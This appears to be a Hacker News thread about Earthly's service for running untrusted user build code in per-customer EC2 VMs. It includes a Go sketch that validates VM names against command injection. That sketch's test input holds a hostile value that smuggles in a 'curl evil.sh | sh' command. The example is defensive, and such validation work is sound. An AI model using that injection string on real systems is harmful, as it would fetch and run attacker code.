[HN Gopher] Remote Code Execution as a Service
       ___________________________________________________________________
        
       Remote Code Execution as a Service
        
       Author : dijit
       Score  : 43 points
       Date   : 2023-03-07 19:29 UTC (3 hours ago)
        
 (HTM) web link (earthly.dev)
 (TXT) w3m dump (earthly.dev)
        
       | rafark wrote:
       | Aren't servers remote execution services?
        
         | seanw444 wrote:
         | You mean a VPS? Yes. An HTTP server, no. At least not by
         | default / design.
        
       | rkeene2 wrote:
       | I also allow remote code execution, though interactively [0].
       | That said, I'm not using any VMs or anything like that for
       | isolation.
       | 
       | Note: All the interesting stuff is in /opt/appfs
       | 
       | [0] https://rkeene.dev/js-repl/?arg=bash
        
       | phphphphp wrote:
       | Perhaps a dumb question, but container breakouts are a problem
       | for all sorts of services and have been addressed in different
       | ways. Since your goal is not to prevent container breakouts but
       | rather securely run third-party code, why did you choose to use
       | EC2 over something like ECS or Lambda or Google Cloud Run which
       | is already dealing with the security aspect on your behalf?
       | Virtual machines seem less secure and less convenient.
        
         | adamgordonbell wrote:
         | Good question. Our goal is not just to run arbitrary code but
         | to run it fast and cache work to avoid redoing it. We are a CI
         | service and speed is important. Brandon may be able to jump in
         | on why we passed on the various options, but it's hard to beat
         | giving users powerful cloud machines to run their builds on.
         | 
         | I did try to run buildkit in a Lambda myself, as I thought that
         | would be a low-cost option. But I found that you couldn't make
         | gRPC calls against a Lambda, and that is a hard requirement for
         | us.
        
           | AlexCoventry wrote:
           | Are you concerned about AWS launching a competing service if
           | you get significant traction?
        
           | brandonschurman wrote:
           | Part of the reason we went with EC2 over something like ECS
           | is that we would need to run the container in privileged mode
           | for some of our features to work. We also considered options
           | like gVisor, but ultimately the EC2 route was a simple enough
           | implementation that made it easy to manage the user's cache
           | volumes, etc. We're also hoping to use Firecracker VMs in the
           | near future.
        
       | adamgordonbell wrote:
       | Thanks for sharing this. One of the authors here.
       | 
       | We built a service that executes arbitrary user-submitted code.
       | An RCE service. It's the thing you're not supposed to build, but
       | we had to do it.
       | 
       | Running arbitrary code means containers weren't a good fit
       | (container breakouts happen), so we are spinning EC2 instances
       | up and down. This means we have actual infrastructure as code
       | (i.e., not just piles of Terraform but Go code running in a
       | service that spins VMs up and down based on API calls).
       | 
       | The service spins up and down EC2 instances based on user
       | requests and executes user-submitted build scripts inside them.
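For readers wondering what "infrastructure as code" looks like in this sense, here is a minimal Go sketch of a service that creates and destroys VMs in response to API calls, mapping each customer to at most one instance (as described further down the thread). Provider, fakeProvider, Fleet, Acquire, and Release are hypothetical names for illustration, not Earthly's code; a real Provider would presumably wrap the EC2 RunInstances and TerminateInstances operations, and real state would need to survive a service restart.

```go
package main

import (
	"errors"
	"fmt"
	"sync"
)

// Provider abstracts the cloud API (hypothetical). A real implementation
// might call EC2 RunInstances / TerminateInstances.
type Provider interface {
	Launch(customer string) (instanceID string, err error)
	Terminate(instanceID string) error
}

// fakeProvider hands out sequential IDs so the sketch runs without AWS.
type fakeProvider struct {
	next int
	live map[string]bool
}

func (p *fakeProvider) Launch(_ string) (string, error) {
	p.next++
	id := fmt.Sprintf("i-%04d", p.next)
	p.live[id] = true
	return id, nil
}

func (p *fakeProvider) Terminate(id string) error {
	if !p.live[id] {
		return errors.New("unknown instance " + id)
	}
	delete(p.live, id)
	return nil
}

// Fleet maps each customer to at most one VM and creates or destroys
// instances in response to API calls.
type Fleet struct {
	mu       sync.Mutex
	provider Provider
	byCust   map[string]string // customer -> instance ID
}

func NewFleet(p Provider) *Fleet {
	return &Fleet{provider: p, byCust: map[string]string{}}
}

// Acquire returns the customer's existing instance or launches a new one.
func (f *Fleet) Acquire(customer string) (string, error) {
	f.mu.Lock()
	defer f.mu.Unlock()
	if id, ok := f.byCust[customer]; ok {
		return id, nil
	}
	id, err := f.provider.Launch(customer)
	if err != nil {
		return "", err
	}
	f.byCust[customer] = id
	return id, nil
}

// Release terminates the customer's instance, if it has one.
func (f *Fleet) Release(customer string) error {
	f.mu.Lock()
	defer f.mu.Unlock()
	id, ok := f.byCust[customer]
	if !ok {
		return nil
	}
	if err := f.provider.Terminate(id); err != nil {
		return err
	}
	delete(f.byCust, customer)
	return nil
}

func main() {
	fleet := NewFleet(&fakeProvider{live: map[string]bool{}})
	a, _ := fleet.Acquire("alice")
	again, _ := fleet.Acquire("alice")
	b, _ := fleet.Acquire("bob")
	fmt.Println(a, again, b) // i-0001 i-0001 i-0002
	_ = fleet.Release("alice")
}
```

Keeping the cloud calls behind an interface is one way to make this kind of lifecycle logic testable without spending real compute dollars.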
       | 
       | It's not the standard web service we were used to building, so we
       | thought we'd write it up and share it with anyone interested.
       | 
       | One cool thing we learned was how quickly you can Hibernate and
       | wake up x86 EC2 instances. That ended up being a game-changer for
       | us.
       | 
       | Corey and Brandon did the building; I'm mainly just the person
       | who wrote things down. Hopefully people find this interesting.
        
         | plicense wrote:
         | I would suggest also looking at
         | https://github.com/bazelbuild/remote-apis. It's essentially a
         | standard API for remote (any binary) execution as a service, and
         | there are several reference implementations of it (BuildGrid,
         | Buildbarn, Google's own service, etc.).
         | 
         | You could also consider using gVisor to greatly reduce the risk
         | of container breakouts.
        
           | adamgordonbell wrote:
           | I'll check out that remote-apis link.
           |
           | gVisor was considered, but so far it looks like the next
           | iteration will be using Firecracker VMs. Our backend is
           | buildkit, and it can't run in gVisor containers without some
           | work.
        
         | xxpor wrote:
         | Did you consider using firecracker?
        
           | adamgordonbell wrote:
           | Yeah, we totally did, and Corey has actually been playing
           | around with a POC backed by Firecracker. It's likely the
           | next revision of this will use Firecracker.
           |
           | So it wasn't so much disqualified as deemed not to be the v1
           | solution. We wanted to ship something, get people on it, and
           | get feedback, so we weren't afraid to spend some more compute
           | dollars to do so.
        
         | k__ wrote:
         | I had the impression that's what fly.io was doing.
         | 
         | Converting Docker images to run in VMs instead of containers.
        
           | slondr wrote:
           | Fly uses Firecracker like AWS Lambda, not full-fledged VMs
           | like EC2.
        
         | cptnntsoobv wrote:
         | > One cool thing we learned was how quickly you can Hibernate
         | and wake up x86 EC2 instances. That ended up being a game-
         | changer for us.
         | 
         | Could you talk more about it? Are you keeping a cache of
         | hibernated EC2 instances and re-launching them per request?
         | What sort of relaunch latency profile do you see as a function
         | of instance memory size?
        
           | adamgordonbell wrote:
           | A specific EC2 instance only ever serves one customer, at
           | most. Builds are highly cacheable, so the EC2 instance has
           | an EBS volume attached with a big cache that Earthly uses to
           | avoid redoing work.
           |
           | That instance just sits around waiting for gRPC requests
           | that tell it to run another build. If it's idle for 30
           | minutes, it hibernates, and if another call comes in, a gRPC
           | proxy wakes it back up.
           |
           | I don't know whether the wake-up time increases with the size
           | of the cache in memory; I can check with Brandon. But it's
           | much faster than starting up an instance cold, mainly because
           | buildkit is designed for throughput, not quick startup.
           | 
           | There are more details in the blog.
        
         | iueotnmunto wrote:
         | While container breakouts do happen, they're pretty rare. I'd
         | be more concerned about any potential injection vectors in the
         | Go code, which could lead to a cloud breach if you're not
         | careful ;)
        
           | adamgordonbell wrote:
           | Oh interesting. What were you imagining as the injection
           | vector?
           | 
           | The Earthly backend runs on a modified buildkit, so it is
           | running the arbitrary code in a container, but that container
           | is also in its own VM. This was simpler than Firecracker to
           | get started with, and it turned out to have pretty good
           | performance and reasonable cost once we started suspending
           | things.
        
             | iueotnmunto wrote:
             | More like if you're running
             | `provision --vm-name "$UserSuppliedData"` or similar. I
             | don't know how you've built your wrapping tool, so I can't
             | comment on how likely it would be, but I've seen such
             | breakages IRL (I break things for a living ;) )
        
               | brandonschurman wrote:
               | Good point, though we do have things locked down pretty
               | well in our Go code. The instances can only be provisioned
               | using an API, and that API doesn't allow for arbitrary
               | user-supplied input.
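One common way to close the injection vector discussed here, sketched under assumptions: validate any user-derived value against a strict allowlist before it reaches provisioning, and build the command as an argument vector rather than a shell string. The `provision --vm-name` command is taken from the hypothetical example in the comment above, provisionCmd and the naming rule are made up for illustration, and Earthly's actual provisioning API is not shown in the thread.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
)

// vmName is a hypothetical allowlist: starts with a lowercase letter,
// then lowercase letters, digits, or hyphens, at most 63 characters.
var vmName = regexp.MustCompile(`^[a-z][a-z0-9-]{0,62}$`)

// provisionCmd validates the name and builds the command without a shell,
// so the name is passed as a single argv entry, never parsed by bash.
func provisionCmd(name string) (*exec.Cmd, error) {
	if !vmName.MatchString(name) {
		return nil, fmt.Errorf("invalid vm name %q", name)
	}
	return exec.Command("provision", "--vm-name", name), nil
}

func main() {
	for _, name := range []string{"build-42", `x"; curl evil.sh | sh; "`} {
		cmd, err := provisionCmd(name)
		if err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		// cmd.Run() would execute it; here we only show the argv.
		fmt.Println("would run:", cmd.Args)
	}
}
```

Because os/exec does not invoke a shell, quotes and semicolons in an argument are not interpreted; the allowlist adds a second layer so unexpected input is rejected before any command is built.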
        
           | raesene9 wrote:
           | There have been a bunch of Linux kernel privesc vulns that
           | can be converted to container breakouts from standard Linux
           | containers, just look at bounties from Google's kCTF (AFAIK
           | they've had 10 different kernel vulns in 2 years)
           | 
           | It's possible to mitigate/reduce them for sure, with
           | appropriate hardening, but the Linux kernel is still quite a
           | big attack surface.
        
             | flangola7 wrote:
             | What about kernels like seL4? I think everyone will abandon
             | monolithic kernels one day because they have too much
             | attack surface.
        
       ___________________________________________________________________
       (page generated 2023-03-07 23:01 UTC)